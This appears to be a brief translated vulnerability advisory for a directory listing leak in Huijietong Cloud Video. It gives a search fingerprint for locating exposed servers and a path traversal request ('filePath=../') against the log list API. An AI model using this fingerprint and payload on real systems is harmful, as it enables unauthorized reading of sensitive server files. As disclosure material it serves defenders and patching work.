Post

Huijietong Cloud Video List Directory File Leak Vulnerability

Huijietong Cloud Video List Directory File Leak Vulnerability

#Huijietong Cloud Video list directory file leak vulnerability

Vulnerability Description

A file list parameter of Huijietong Cloud Video has a directory file leakage vulnerability, and the attacker can obtain some sensitive information through the vulnerability.

Vulnerability Impact

Huijietong Cloud Video

Network surveying and mapping

body=”/him/api/rest/v1.0/node/role”

Vulnerability reappears

The login page is as follows

img

Visit Url

/him/api/rest/V1.0/system/log/list?filePath=../

img

##

This post is licensed under CC BY 4.0 by the author.